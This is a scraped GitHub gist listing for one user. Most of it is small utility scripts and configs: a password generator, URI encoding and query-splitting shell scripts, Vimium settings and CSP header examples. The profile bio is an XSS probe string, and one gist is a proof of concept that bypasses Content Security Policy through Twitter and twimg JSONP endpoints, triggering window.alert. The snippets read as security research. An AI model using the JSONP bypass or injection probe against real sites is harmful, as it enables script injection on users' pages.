Skip to content

Instantly share code, notes, and snippets.

:shipit:
'\'"><script>alert(1)</script>

Shintaro Kobori shinkbr

:shipit:
'\'"><script>alert(1)</script>
Block or report user

Report or block shinkbr

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View README.md
$ time ./a.out
4./a.out  18.75s user 0.01s system 99% cpu 18.879 total

$ time ./b.out
4./b.out  23.44s user 0.02s system 99% cpu 23.550 total

$ gcc --version
Configured with: --prefix=/Library/Developer/CommandLineTools/usr --with-gxx-include-dir=/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/c++/4.2.1
Apple clang version 11.0.0 (clang-1100.0.33.8)
View pixiv-inside-csp3-01
# 'self' と trusted.example.comのJSのみ実行を許可する
content-security-policy: script-src 'self' trusted.example.com
# 上記に加えてinline scriptの実行も許可する (XSS対策としての恩恵はほぼ無い)
content-security-policy: script-src 'self' trusted.example.com 'unsafe-inline'
@shinkbr
shinkbr / csp-bypass.html
Created Aug 23, 2018
CSP bypass using twitter.com and twimg.com's JSONP endpoint
View csp-bypass.html
<script src="https://platform.twitter.com/widgets.js"></script>
<script src="https://cdn.syndication.twimg.com/timeline/profile?callback=__twttr/window.alert&screen_name=shinkbr"></script>
@shinkbr
shinkbr / vimium-options.json
Last active Sep 12, 2018
vimium configuration json
View vimium-options.json
{
"settingsVersion": "1.64",
"exclusionRules": [
{
"pattern": "https?://mail.google.com/*",
"passKeys": ""
}
],
"filterLinkHints": false,
"waitForEnterForFilteredHints": true,
@shinkbr
shinkbr / password.rb
Created Jan 21, 2018
Generate random and complex passwords
View password.rb
#!/usr/bin/env ruby
# coding: utf-8
length = 12
if ARGV.size > 0 && (ARGV[0].to_i.to_s == ARGV[0]) &&
ARGV[0].to_i >= 4 && ARGV[0].to_i <= 128
length = ARGV[0].to_i
end
View keybase.md

Keybase proof

I hereby claim:

  • I am shinkbr on github.
  • I am shinkbr (https://keybase.io/shinkbr) on keybase.
  • I have a public key ASBsCQn4yQsMGCbliF0qFt3zEUj1FjLnObjjDNV4UqNo8Ao

To claim this, I am signing this object:

@shinkbr
shinkbr / query.sh
Last active Nov 20, 2017
Extract and split URL query parameters
View query.sh
#!/usr/bin/env bash
read uri
query=${uri##*\?}
echo -n "$query" | tr "&" "\n"
@shinkbr
shinkbr / uri.sh
Last active Nov 20, 2017
URI encode / decode strings.
View uri.sh
#!/usr/bin/env bash
usage () {
echo "Usage: $( basename $0 ) <e|d>"
}
if [ "$#" -ne 1 ]; then
usage
exit 1
fi
@shinkbr
shinkbr / rand.sh
Last active Jan 21, 2018
generate random string with a given byte size
View rand.sh
#!/usr/bin/env bash
num=4
if [[ "${1}" -gt "0" ]]; then
num="${1}"
fi
openssl rand -hex "${num}"
You can’t perform that action at this time.